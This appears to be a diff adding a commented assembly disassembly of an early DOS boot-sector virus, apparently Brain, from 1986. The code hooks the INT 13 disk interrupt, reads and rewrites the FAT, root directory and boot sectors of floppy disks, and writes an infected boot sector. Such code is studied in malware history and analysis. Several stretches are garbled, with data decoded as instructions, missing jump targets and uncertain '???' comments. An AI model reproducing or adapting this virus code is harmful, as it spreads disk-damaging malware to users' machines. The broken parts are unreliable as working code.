+    JNZ  ERROR_1             ;'NON SYSTEM DISK'
+    POP  SI             ;
+    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+L039D    DB   'IBMBIO  COM'
+    DB   'IBMDOS  COM'
+    DB   CR,LF,'Non-System disk',0
+    DB   CR,LF,'BOOT failure',0
+    DB   CR,LF,'Replace and press any key when ready',0
+    DB   90H,90H,90H,55H,0AAH
+
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+L0400:   JMP  SHORT CONT_A        ;
+                        ;
+    DB   '(c) 1986 Basit & Amjads (pvt) Ltd ',0
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+CONT_A:                      ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+L0A5B    DB   'IBMBIO  COM'
+    DB   'IBMDOS  COM'
+    DB   CR,LF,'Non-System disk',0
+    DB   CR,LF,'BOOT failure',0
+    DB   CR,LF,'Replace and press any key when ready',0
+    DB   90H,90H,90H,55H,0AAH
+
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+    ADD  AL,00               ;0425 0400
+    ADD  [06C6],CH      ;0427 002EC606
+    AND  AX,1F02             ;042B 25021F
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+REDIRECT_13:                 ;042E
+    XOR  AX,AX               ;GET INT 13 VECTOR
+    MOV  DS,AX               ;
+    MOV  AX,[004CH]          ;
+    MOV  [01B4H],AX          ;   (SAVE IT TO INT 6D VECTOR)
+    MOV  AX,[004EH]          ;
+    MOV  [01B6H],AX          ;
+    MOV  AX,0276H       ;SET INT 13 VECTOR
+    MOV  [004CH],AX          ;
+    MOV  AX,CS               ;
+    MOV  [004EH],AX          ;
+                        ;
+    MOV  CX,0004             ;RETRY = 4
+    XOR  AX,AX               ;
+    MOV  ES,AX               ;
+L0450:   PUSH CX             ;
+    MOV  DH,CS:[0006]        ;DH = HEAD
+    MOV  DL,00               ;DRIVE A:
+    MOV  CX,CS:[0007]        ;CX = TRACK/SECTOR
+    MOV  AX,0201             ;READ 1 SECTOR
+    MOV  BX,7C00             ;ES:BX == DTA = 0000:7C00
+    INT  6DH            ;
+    JNB  L0470               ;
+    MOV  AH,00               ;RESET
+    INT  6DH            ;
+    POP  CX             ;TRY AGAIN
+    LOOP L0450               ;
+    INT  18H            ;LOAD BASIC
+                        ;
+L0470:   JMP  0000:7C00      ;JUMP TO BOOT LOADER ?!?!
+                        ;
+    NOP                 ;0475 90
+    STI                 ;0476 FB
+    CMP  AH,02               ;0477 80FC02
+    JNZ  L0494               ;047A 7518
+    CMP  DL,02               ;047C 80FA02
+    JA   L0494               ;047F 7713
+    CMP  CH,00               ;0481 80FD00
+    JNZ  L048B               ;0484 7505
+    CMP  DH,00               ;0486 80FE00
+    JZ   L0497               ;0489 740C
+L048B:   DEC  Byte Ptr CS:[0225]  ;048B 2EFE0E2502
+    JNZ  L0494               ;0490 7502
+    JMP  L0497               ;0492 EB03
+L0494:   JMP  L053C               ;0494 E9A500
+L0497:   MOV  Byte Ptr CS:[0227],00    ;0497 2EC606270200
+    MOV  Byte Ptr CS:[0225],04    ;049D 2EC606250204
+    PUSH AX             ;04A3 50
+    PUSH BX             ;04A4 53
+    PUSH CX             ;04A5 51
+    PUSH DX             ;04A6 52
+    MOV  CS:[0226],DL        ;04A7 2E88162602
+    MOV  CX,0004             ;04AC B90400
+    PUSH CX             ;04AF 51
+    MOV  AH,00               ;04B0 B400
+    INT  6D             ;04B2 CD6D
+    JB   ;04CB               ;04B4 7215
+    MOV  DH,00               ;04B6 B600
+    MOV  CX,0001             ;04B8 B90100
+    MOV  BX,06BE             ;04BB BBBE06
+    PUSH ES             ;04BE 06
+    MOV  AX,CS               ;04BF 8CC8
+    MOV  ES,AX               ;04C1 8EC0
+    MOV  AX,0201             ;04C3 B80102
+    INT  6D             ;04C6 CD6D
+    POP  ES             ;04C8 07
+    JNB  ;04D1               ;04C9 7306
+    POP  CX             ;04CB 59
+    LOOP ;04AF               ;04CC E2E1
+    JMP  ;04FF               ;04CE EB2F
+    NOP                 ;04D0 90
+    POP  CX             ;04D1 59
+    MOV  AX,CS:[06C2]        ;04D2 2EA1C206
+    CMP  AX,1234             ;04D6 3D3412
+    JNZ  ;04E3               ;04D9 7508
+    MOV  Byte Ptr CS:[0227],01    ;04DB 2EC606270201
+    JMP  ;0503               ;04E1 EB20
+    PUSH DS             ;04E3 1E
+    PUSH ES             ;04E4 06
+    MOV  AX,CS               ;04E5 8CC8
+    MOV  DS,AX               ;04E7 8ED8
+    MOV  ES,AX               ;04E9 8EC0
+    PUSH SI             ;04EB 56
+    CALL L0804               ;04EC E81503
+    JB   ;04FA               ;04EF 7209
+    MOV  Byte Ptr CS:[0227],02    ;04F1 2EC606270202
+    CALL L06B2               ;04F7 E8B801
+    POP  SI             ;04FA 5E
+    POP  ES             ;04FB 07
+    POP  DS             ;04FC 1F
+    JNB  ;0503               ;04FD 7304
+    MOV  AH,00               ;04FF B400
+    INT  6D             ;0501 CD6D
+    POP  DX             ;0503 5A
+    POP  CX             ;0504 59
+    POP  BX             ;0505 5B
+    POP  AX             ;0506 58
+    CMP  CX,+01              ;0507 83F901
+    JNZ  L053C               ;050A 7530
+    CMP  DH,00               ;050C 80FE00
+    JNZ  L053C               ;050F 752B
+    CMP  Byte Ptr CS:[0227],01    ;0511 2E803E270201
+    JNZ  ;052A               ;0517 7511
+    MOV  CX,CS:[06C5]        ;0519 2E8B0EC506
+    MOV  DX,CS:[06C3]        ;051E 2E8B16C306
+    MOV  DL,CS:[0226]        ;0523 2E8A162602
+    JMP  L053C               ;0528 EB12
+    CMP  Byte Ptr CS:[0227],02    ;052A 2E803E270202
+    JNZ  L053C               ;0530 750A
+                        ;
+    MOV  CX,CS:[0007]        ;CX = TRACK/SECTOR
+    MOV  DH,CS:[0006]        ;DH = HEAD
+L053C:   INT  6DH            ;
+    RETF 2              ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+L0541    DB   0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+L0550:   JMP  CONTINUE_3          ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+L0553    DW   3              ;
+    DB   ' (c) 1986 Basit & Amjads (pvt) Ltd'
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+CONTINUE_3:                  ;0577
+    CALL READ_VERIFY         ;READ VERIFY
+    MOV  AX,[06BEH]          ;IF ??? == DOUBLD SIDED 9 SECTORS...
+    CMP  AX,0FFFDH      ;
+    JE   L0586               ;...CONTINUE
+    MOV  AL,3           ;ELSE RETURN ??? ERROR
+    STC                 ;
+    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+L0586:                       ;0586
+    MOV  CX,0037             ;
+    MOV  Word Ptr [0353],0000     ;
+    CALL ;05F8               ;058F E86600
+    CMP  AX,0000             ;0592 3D0000
+    JNZ  ;05A5               ;0595 750E
+    INC  Word Ptr [0353]          ;0597 FF065303
+    CMP  Word Ptr [0353],+03 ;059B 833E530303
+    JNZ  ;05AB               ;05A0 7509
+    JMP  ;05B6               ;05A2 EB12
+    NOP                 ;05A4 90
+    MOV  Word Ptr [0353],0000     ;05A5 C70653030000
+    INC  CX             ;05AB 41
+    CMP  CX,0163             ;05AC 81F96301
+    JNZ  ;058F               ;05B0 75DD
+    MOV  AL,01               ;05B2 B001
+    STC                 ;05B4 F9
+    RET                 ;05B5 C3
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+    MOV  DL,03               ;05B6 B203
+    CALL ;05CB               ;05B8 E81000
+    DEC  CX             ;05BB 49
+    DEC  DL             ;05BC FECA
+    JNZ  ;05B8               ;05BE 75F8
+    INC  CX             ;05C0 41
+    CALL CONVERT_1      ;CLUSTER TO TRACK/SECTOR/HEAD
+    CALL ;062D               ;05C4 E86600
+    MOV  AL,00               ;05C7 B000
+    CLC                 ;05C9 F8
+    RET                 ;05CA C3
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+    PUSH CX             ;05CB 51
+    PUSH DX             ;05CC 52
+    MOV  SI,06BE             ;05CD BEBE06
+    MOV  AL,CL               ;05D0 8AC1
+    SHR  AL,1           ;05D2 D0E8
+    JB   ;05E4               ;05D4 720E
+    CALL FUNCTION_1          ;BX = (CX*3)/2
+    MOV  AX,[BX+SI]          ;05D9 8B00
+    AND  AX,F000             ;05DB 2500F0
+    OR   AX,0FF7             ;05DE 0DF70F
+    JMP  ;05EF               ;05E1 EB0C
+    NOP                 ;05E3 90
+    CALL FUNCTION_1          ;BX = (CX*3)/2
+    MOV  AX,[BX+SI]          ;05E7 8B00
+    AND  AX,000F             ;05E9 250F00
+    OR   AX,FF70             ;05EC 0D70FF
+    MOV  [BX+SI],AX          ;05EF 8900
+    MOV  [BX+SI+0400],AX          ;05F1 89800004
+    POP  DX             ;05F5 5A
+    POP  CX             ;05F6 59
+    RET                 ;05F7 C3
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+    PUSH CX             ;05F8 51
+    MOV  SI,06BE             ;05F9 BEBE06
+    MOV  AL,CL               ;05FC 8AC1
+    SHR  AL,1           ;05FE D0E8
+    JB   L060D               ;0600 720B
+    CALL FUNCTION_1          ;BX = (CX*3)/2
+    MOV  AX,[BX+SI]          ;0605 8B00
+    AND  AX,0FFF             ;0607 25FF0F
+    JMP  L0619               ;060A EB0D
+                        ;
+L060D:   CALL FUNCTION_1          ;BX = (CX*3)/2
+    MOV  AX,[BX+SI]          ;0610 8B00
+    AND  AX,FFF0             ;0612 25F0FF
+    MOV  CL,04               ;0615 B104
+    SHR  AX,CL               ;0617 D3E8
+L0619:   POP  CX             ;0619 59
+    RET                 ;061A C3
+                        ;
+;-----------------------------------------------------------------------;
+; BX = (CX*3)/2                                       ;
+;-----------------------------------------------------------------------;
+FUNCTION_1:                  ;061B
+    PUSH DX             ;
+    MOV  AX,3           ;
+    MUL  CX             ;
+    SHR  AX,1           ;
+    MOV  BX,AX               ;
+    POP  DX             ;
+    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+READ_VERIFY:                 ;0627
+    MOV  AH,2           ;
+    CALL VERIFY_SECTORS      ;
+    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+WRITE_VERIFY:                ;062D
+    MOV  AH,03               ;
+    CALL VERIFY_SECTORS      ;
+    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+VERIFY_SECTORS:                   ;0633
+    MOV  CX,4           ;RETRY = 4
+L0636:   PUSH CX             ;
+    PUSH AX             ;
+    MOV  AH,0           ;REST
+    INT  6DH            ;
+    POP  AX             ;
+    JB   L0653               ;
+    MOV  BX,offset L06BEH    ;
+    MOV  AL,4           ;4==VERIFY
+    MOV  DH,00               ;HEAD 0
+    MOV  DL,[0226]      ;DRIVE DL
+    MOV  CX,0002             ;TRACK 0/SECTOR 2
+    PUSH AX             ;
+    INT  6DH            ;
+    POP  AX             ;
+    JNB  L065C               ;IF ERROR...EXIT
+L0653:   POP  CX             ;
+    LOOP L0636               ;RETRY
+    POP  AX             ;
+    POP  AX             ;
+    MOV  AL,2           ;BAD ADDRESS MARK ???
+    STC                 ;RETURN ERROR
+    RET                 ;
+                        ;
+L065C:   POP  CX             ;
+    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+; CONVERT CLUSTERS TO TRACK/SECTOR/HEAD ????                    ;
+;-----------------------------------------------------------------------;
+CONVERT_1:                   ;065E
+    PUSH CX             ;
+    SUB  CX,2           ;
+    SHL  CX,1           ;WORD PTR
+    ADD  CX,9*2              ;   (SECTORS PER CYLINDER ???)
+    MOV  AX,CX               ;
+    MOV  CL,9*2              ;   (SECTORS PER CYLINDER ???)
+    DIV  CL             ;
+    MOV  DS:[0008],AL        ;AL = TRACK
+    MOV  Byte Ptr DS:[0006],0     ;INC. HEAD
+    INC  AH             ;INC. SECTOR
+    CMP  AH,9           ;IF TOO BIG...
+    JBE  L0684               ;
+    SUB  AH,9           ;...START AT ZERO
+    MOV  Byte Ptr DS:[0006],1     ;INC. HEAD
+L0684:   MOV  DS:[0007],AH        ;
+    POP  CX             ;
+    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+    ADD  [BX+SI],AL          ;068A 0000
+    ADD  [BX+SI],AL          ;068C 0000
+    ADD  [BX+SI],AL          ;068E 0000
+    ADD  BP,[SI+00]          ;0690 036C00
+    ADD  AX,[BP+DI]          ;0693 0303
+    MOV  SI,010E             ;0695 BE0E01
+    ADD  [BX+SI],AL          ;0698 0000
+    ADD  AX,SP               ;069A 01E0
+    FCOMP     DWord Ptr [DI+E0D7] ;069C D89DD7E0
+    LAHF                ;06A0 9F
+    LEA  BX,[BX+SI+8E9F]          ;06A1 8D989F8E
+    LOOPNZ    ;06C7               ;06A5 E020
+    SUB  [BP+DI+29],AH       ;06A7 286329
+    AND  [BP+SI+72],AL       ;06AA 204272
+    POPA                ;06AD 61
+    IMUL BP,[BP+20],E824          ;06AE 696E2024E8
+    FILD DWord Ptr [BX+SI]   ;06B3 DB00
+    JB   L06C1               ;06B5 720A
+    PUSH DI             ;06B7 57
+    CALL ;06DA               ;06B8 E81F00
+    POP  DI             ;06BB 5F
+    JB   L06C1               ;06BC 7203
+    CALL WRITE_RBF      ;WRITE ROOT BOOT FAT
+L06C1:   RET                 ;06C1 C3
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+    MOV  BX,049B             ;06C2 BB9B04
+    MOV  CX,000B             ;
+L06C8:   MOV  AL,[BX]             ;
+    NEG  AL             ;
+    MOV  [SI],AL             ;
+    INC  SI             ;
+    INC  BX             ;
+    LOOP L06C8               ;
+                        ;
+    MOV  AL,08               ;
+    MOV  [SI],AL             ;
+    CLC                 ;
+    RET                 ;06D7 C3
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+    MOV  Byte Ptr [06C7],91  ;06D8 C606C70691
+    ADD  AL,6C               ;06DD 046C
+    ADD  [BP+06FE],BH        ;06DF 00BEFE06
+    MOV  [0493],DX      ;06E3 89169304
+    MOV  AX,[0491]      ;06E7 A19104
+    SHR  AX,1           ;06EA D1E8
+    MOV  [0497],AX      ;06EC A39704
+    SHR  AX,1           ;06EF D1E8
+    MOV  [0495],AX      ;06F1 A39504
+    XCHG AX,CX               ;06F4 91
+    AND  CL,43               ;06F5 80E143
+    MOV  DI,[0495]      ;06F8 8B3E9504
+    ADD  DI,01E3             ;06FC 81C7E301
+    MOV  AL,[SI]             ;0700 8A04
+    CMP  AL,00               ;0702 3C00
+    JZ   ;071B               ;0704 7415
+    MOV  AL,[SI+0B]          ;0706 8A440B
+    AND  AL,08               ;0709 2408
+    CMP  AL,08               ;070B 3C08
+    JZ   ;071B               ;070D 740C
+    ADD  SI,+20              ;070F 83C620
+    DEC  Word Ptr [0491]          ;0712 FF0E9104
+    JNZ  ;0700               ;0716 75E8
+    STC                 ;0718 F9
+    RET                 ;0719 C3
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+:                       ;071A
+    MOV  CX,[BP+DI+331D]          ;
+    PUSH DS             ;071E 1E
+    XCHG AX,DI               ;071F 97
+    ADD  AL,89               ;0720 0489
+    XCHG AX,DI               ;0722 3697
+    ADD  AL,FA               ;0724 04FA
+    MOV  AX,SS               ;0726 8CD0
+    MOV  SS:[0493],AX        ;0728 A39304
+    MOV  [0495],SP      ;072B 89269504
+    MOV  AX,CS               ;072F 8CC8
+    MOV  SS,AX               ;0731 8ED0
+    MOV  SP,[0497]      ;0733 8B269704
+    ADD  SP,+0C              ;0737 83C40C
+    MOV  CL,51               ;073A B151
+    ADD  DX,444C             ;073C 81C24C44
+    MOV  DI,2555             ;0740 BF5525
+    MOV  CX,0C03             ;0743 B9030C
+    REPZ                ;0746 F3
+    CMPSW                    ;0747 A7
+    MOV  AX,0B46             ;0748 B8460B
+    MOV  CX,0003             ;074B B90300
+    ROL  AX,CL               ;074E D3C0
+    MOV  [0497],AX      ;0750 A39704
+    MOV  CX,0005             ;0753 B90500
+    MOV  DX,0008             ;0756 BA0800
+    SUB  Word Ptr [0497],5210     ;0759 812E97041052
+    PUSH [0497]              ;075F FF369704
+L0763:   MOV  AH,[BX]             ;0763 8A27
+    INC  BX             ;0765 43
+    MOV  DL,AH               ;0766 8AD4
+    SHL  DL,1           ;0768 D0E2
+    JB   L0763               ;076A 72F7
+L076C:   MOV  DL,[BX]             ;076C 8A17
+    INC  BX             ;076E 43
+    MOV  AL,DL               ;076F 8AC2
+    SHL  DL,1           ;0771 D0E2
+    JB   L076C               ;0773 72F7
+    ADD  AX,1D1D             ;0775 051D1D
+    PUSH AX             ;0778 50
+    INC  Word Ptr [0497]          ;0779 FF069704
+    JNB  L0780               ;077D 7301
+    JMP  268B:E1E2      ;077F EAE2E18B26
+                        ;
+    XCHG AX,BP               ;0784 95
+    ADD  AL,A1               ;0785 04A1
+    XCHG AX,BX               ;0787 93
+    ADD  AL,8E               ;0788 048E
+    SAR  BL,1           ;078A D0FB
+    ADD  DH,[BP+SI]          ;078C 0232
+    CLC                 ;078E F8
+    RET                 ;078F C3
+                        ;
+;-----------------------------------------------------------------------;
+; READ ROOT, BOOT, FIRST FAT                          ;
+;-----------------------------------------------------------------------;
+READ_RBF:                    ;0790
+    MOV  Byte Ptr [0490],02  ;COMMAND = READ
+    JMP  ROOT_BOOT_FAT       ;DO IT
+                        ;
+;-----------------------------------------------------------------------;
+; WRITE ROOT, BOOT, FIRST FAT                              ;
+;-----------------------------------------------------------------------;
+WRITE_RBF:                   ;0798
+    MOV  Byte Ptr [0490],03  ;COMMAND = WRITE
+    JMP  ROOT_BOOT_FAT       ;DO IT
+                        ;
+;-----------------------------------------------------------------------;
+; READ OR WRITE ROOT, BOOT, FIRST FAT                      ;
+;-----------------------------------------------------------------------;
+ROOT_BOOT_FAT:                    ;07A0
+    MOV  DH,0           ;HEAD = 0
+    MOV  DL,[226H]      ;DL = DRIVE
+    MOV  CX,6           ;(TRACK 0/SECTOR 6) == ENTIRE ROOT DIR
+    MOV  AH,[490H]      ;AH = COMMAND
+    MOV  AL,4           ;4 SECTORS
+    MOV  BX,6BEH             ;ES:BX = DTA
+    CALL RESET_DO_IT         ;GO TO DISK
+    JB   L07C9               ;IF ERROR...EXIT
+                        ;
+    MOV  CX,1           ;(TRACK 0/SECTOR 1) == BOOT & FAT1
+    MOV  DH,1           ;HEAD 1
+    MOV  AH,[490H]      ;AH = COMMAND
+    MOV  AL,3           ;3 SECTORS
+    ADD  BX,800H             ;ES:BX = DTA
+    CALL RESET_DO_IT         ;GO TO DISK
+L07C9:   RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+; RESET DRIVE BEFORE DOING SPECIFIED FUNCTION                   ;
+;-----------------------------------------------------------------------;
+RESET_DO_IT:                 ;07CA
+    MOV  [0493],AX      ;
+    MOV  [0495],BX      ;SAVE REGs
+    MOV  [0497],CX      ;
+    MOV  [0499],DX      ;
+    MOV  CX,0004             ;RETRY COUNT = 4
+                        ;
+RDI_10:  PUSH CX             ;
+    MOV  AH,00               ;REST DRIVE
+    INT  6D             ;
+    JB   RDI_80              ;IF ERROR...RETRY
+    MOV  AX,[0493]      ;RESTORE REGs
+    MOV  BX,[0495]      ;
+    MOV  CX,[0497]      ;
+    MOV  DX,[0499]      ;
+    INT  6D             ;DO SPECIFIED FUNCTION
+    JNB  RDI_90              ;IF NO ERROR...EXIT
+RDI_80:  POP  CX             ;
+    LOOP RDI_10              ;RETRY
+    STC                 ;RETURN ERROR
+    RET                 ;
+                        ;
+RDI_90:  POP  CX             ;RETURN NO ERROR
+    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+    ADD  [BX+SI],AL          ;07FD 0000
+    ADD  [BP+DI],AL          ;07FF 0003
+    ADD  [BX+DI],AL          ;0801 0001
+
+L0804: ?!?!
+
+
+
+
+    ADD  BP,AX               ;0803 03E8
+    DEC  CX             ;0805 49
+    STD                 ;0806 FD
+    JB   ;085D               ;0807 7254
+                        ;
+    MOV  Word Ptr [000A],0001     ;
+    MOV  Byte Ptr [0009],00  ;
+    MOV  BX,06BE             ;ES:BX = DTA ?
+    CALL READ_SECTORS        ;
+                        ;
+    MOV  BX,06BE             ;BX = DTA
+    MOV  AX,[0007]      ;GET SECTOR TRACK
+    MOV  [000A],AX      ;SAVE SECTOR/TRACK
+    MOV  AH,[0006]      ;GET HEAD
+    MOV  [0009],AH      ;SAVE HEAD
+    CALL WRITE_SECTORS       ;WRITE SECTOR(S)
+    CALL NEXT_SECTOR         ;POINT TO NEXT
+                        ;
+    MOV  CX,0005             ;CX = ???
+    MOV  BX,0200             ;BX = DTA
+L0837:   MOV  [0600],CX      ;SAVE ???
+    CALL WRITE_SECTORS       ;WRITE SECTOR(S)
+    CALL NEXT_SECTOR         ;POINT TO NEXT
+    ADD  BX,512              ;DTA += 512
+    MOV  CX,[0600]      ;???
+    LOOP L0837               ;LOOP 5 TIMES ???
+                        ;
+    MOV  Byte Ptr [0009],00  ;HEAD = 0
+    MOV  Word Ptr [000A],0001     ;TRACK/SECTOR = 0/1
+    MOV  BX,0000             ;DTA = INFECTED BOOT SECTOR
+    CALL WRITE_SECTORS       ;WRITE INFECTED BOOT SECTOR
+    CLC                 ;
+    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+READ_SECTORS:                ;085E
+    MOV  Word Ptr [0602H],0201H   ;READ CMD/1 SECTOR
+    JMP  DO_SECTORS          ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+WRITE_SECTORS:                    ;0867
+    MOV  Word Ptr [0602H],0301H   ;WRITE CMD/1 SECTOR
+    JMP  DO_SECTORS          ;
+                        ;
+;-----------------------------------------------------------------------;
+; READ OR WRITE SOME SECTORS WITH A RETRY COUNT OF 4            ;
+;                                           ;
+; ON ENTRY:   DS:[601H] = COMMAND                     ;
+;        DS:[602H] = SECTOR COUNT                ;
+;        DS:[226H] = DRIVE                       ;
+;        DS:[0009] = HEAD                        ;
+;        DS:[000A] = SECTOR                      ;
+;        DS:[000B] = TRACK                       ;
+;-----------------------------------------------------------------------;
+DO_SECTORS:                  ;0870
+    PUSH BX             ;
+    MOV  CX,4           ;RETRY COUNT = 4
+                        ;
+D1S_10:  PUSH CX             ;
+    MOV  DH,[9]              ;HEAD = 9
+    MOV  DL,[226H]      ;DRIVE
+    MOV  CX,[10]             ;TRACK/SECT
+    MOV  AX,[602H]      ;COMMAND/COUNT
+    INT  6DH            ;(SAME AS INT 13)
+    JNB  D1S_80              ;
+                        ;
+    MOV  AH,00               ;RESET
+    INT  6DH            ;(SAME AS INT 13)
+    POP  CX             ;
+    LOOP D1S_10              ;TRY AGAIN
+    POP  BX             ;
+    POP  BX             ;
+    STC                 ;RETURN ERROR
+    RET                 ;
+                        ;
+D1S_80:  POP  CX             ;0893 59
+    POP  BX             ;0894 5B
+    RET                 ;0895 C3
+                        ;
+;-----------------------------------------------------------------------;
+; INC. NEXT SECTOR                               ;
+; ON ENTRY:   DS:[0009] = HEAD                        ;
+;        DS:[000A] = SECTOR                      ;
+;        DS:[000B] = TRACK                       ;
+;-----------------------------------------------------------------------;
+NEXT_SECTOR:                 ;0896
+    INC  Byte Ptr [10]       ;SECTOR
+    CMP  Byte Ptr [10],10    ;
+    JNZ  NS_90               ;
+    MOV  Byte Ptr [10],1          ;
+    INC  Byte Ptr [9]        ;HEAD
+    CMP  Byte Ptr [9],2      ;
+    JNZ  NS_90               ;
+    MOV  Byte Ptr [9],0      ;
+    INC  Byte Ptr [11]       ;TRACK
+NS_90:   RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+    DB   64             ;08BB 'dtk'
+    JZ   ;091F               ;
+                        ;
+;---------------------------------------;
+    JMP  CONTINUE_4          ;08FA
+                        ;
+         DB   'IBM X3.2'     ;OEM NAME AND VERSION
+                        ;
+         DW   512       ;BYTES PER SECTOR
+         DB   2         ;SECTORS PER ALLOCATION UNIT
+         DW   1         ;RESERVED SECTORS
+         DB   2         ;NUMBER OF FATS
+         DW   112       ;NUMBER OF ROOT DIR ENTRIES
+         DW   2D0H      ;SECTORS PER DISK
+         DB   0FDH      ;MEDIA ID
+         DW   2         ;SECTORS PER FAT
+         DW   9         ;SECTORS PER TRACK
+         DW   2         ;NUMBER OF HEADS
+         DW   0         ;HIDDEN SECTORS
+                        ;
+;---------------------------------------;
+         DB   0,0
+         DB   0,0,0,0,0,0,0,0,0,0,0,0,0,0
+
+         DB   002H,0DFH
+         DB   002H,025H,002H,012H
+         DB   02AH,0FFH,050H,0F6H
+         DB   000H,002H,
+
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+    INT  19H            ;REBOOT
+                        ;
+L08FA:   CLI                 ;08FA FA
+    XOR  AX,AX               ;08FB 33C0
+    MOV  ES,AX               ;08FD 8EC0
+    MOV  SS,AX               ;08FF 8ED0
+    MOV  SP,7C00             ;0901 BC007C
+    MOV  DS,AX               ;0904 8ED8
+    MOV  BX,07C0             ;0906 BBC007
+    MOV  Word Ptr [0078],002F     ;0909 C70678002F00
+    MOV  [007A],BX      ;090F 891E7A00
+    MOV  DS,BX               ;0913 8EDB
+    MOV  DX,[001E]      ;0915 8B161E00
+    MOV  [0020],DL      ;0919 88162000
+    INT  13             ;GO TO DISK
+    JNB  ;0924               ;091F 7303
+    JMP  ;09FC               ;0921 E9D800
+    MOV  SI,000B             ;0924 BE0B00
+    MOV  CX,[SI]             ;0927 8B0C
+    SHR  CH,1           ;0929 D0ED
+    XCHG CH,CL               ;092B 86E9
+    MOV  [002B],CX      ;092D 890E2B00
+    MOV  AL,[SI+05]          ;0931 8A4405
+    XOR  AH,AH               ;0934 32E4
+    MUL  Word Ptr [SI+0B]    ;0936 F7640B
+    ADD  AX,[SI+03]          ;0939 034403
+    ADD  AX,[SI+11]          ;093C 034411
+    MOV  [0024],AX      ;093F A32400
+    MOV  BX,7E00             ;0942 BB007E
+    CALL 0A24           ;0945 E8DC00
+    MOV  BX,ES               ;0948 8CC3
+    MOV  AX,0070             ;094A B87000
+    MOV  ES,AX               ;094D 8EC0
+    MOV  AX,0020             ;094F B82000
+    MUL  Word Ptr [SI+06]    ;0952 F76406
+    MOV  CX,[SI]             ;0955 8B0C
+    ADD  AX,CX               ;0957 03C1
+    DEC  AX             ;0959 48
+    DIV  CX             ;095A F7F1
+    ADD  [0024],AX      ;095C 01062400
+    MOV  CL,[002A]      ;0960 8A0E2A00
+    MOV  AX,[0024]      ;0964 A12400
+    CALL ;0971               ;0967 E80700
+    PUSH ES             ;096A 06
+    POP  DS             ;096B 1F
+    JMP  0070:0000      ;096C EA00007000
+                        ;
+;HEAVY NUMBER CRUNCHING HERE      ;
+    PUSH BX             ;0971 53
+    PUSH AX             ;0972 50
+    MOV  AL,CL               ;0973 8AC1
+    MUL  Byte Ptr [002B]          ;0975 F6262B00
+    MOV  [0029],AL      ;0979 A22900
+    POP  AX             ;097C 58
+    MUL  Word Ptr [002B]          ;097D F7262B00
+    DIV  Word Ptr [SI+0D]    ;0981 F7740D
+    INC  DL             ;0984 FEC2
+    MOV  [0028],DL      ;0986 88162800
+    PUSH DX             ;098A 52
+    XOR  DX,DX               ;098B 33D2
+    DIV  Word Ptr [SI+0F]    ;098D F7740F
+    MOV  [0021],DL      ;0990 88162100
+    MOV  [0026],AX      ;0994 A32600
+    POP  DX             ;0997 5A
+    MOV  CL,[0029]      ;0998 8A0E2900
+    ADD  DL,CL               ;099C 02D1
+    MOV  AX,[SI+0D]          ;099E 8B440D
+    INC  AX             ;09A1 40
+    CMP  DL,AL               ;09A2 3AD0
+    JBE  ;09AC               ;09A4 7606
+    SUB  AL,[0028]      ;09A6 2A062800
+    MOV  CL,AL               ;09AA 8AC8
+    MOV  AL,CL               ;09AC 8AC1
+    MOV  DX,[0026]      ;09AE 8B162600
+    MOV  CL,06               ;09B2 B106
+    SHL  DH,CL               ;09B4 D2E6
+    OR   DH,[0028]      ;09B6 0A362800
+    MOV  CX,DX               ;09BA 8BCA
+    XCHG CH,CL               ;09BC 86E9
+    MOV  DX,[0020]      ;09BE 8B162000
+    MOV  AH,02               ;READ SECTOR
+    PUSH AX             ;
+    INT  13             ;
+    POP  AX             ;09C7 58
+    JB   ;09FC               ;09C8 7232
+    SUB  [0029],AL      ;09CA 28062900
+    JBE  ;09F5               ;09CE 7625
+    CBW                 ;09D0 98
+    MUL  Word Ptr [002D]          ;09D1 F7262D00
+    ADD  BX,AX               ;09D5 03D8
+    INC  Byte Ptr [0021]          ;09D7 FE062100
+    MOV  DL,[0021]      ;09DB 8A162100
+    CMP  DL,[SI+0F]          ;09DF 3A540F
+    MOV  DL,01               ;09E2 B201
+    MOV  [0028],DL      ;09E4 88162800
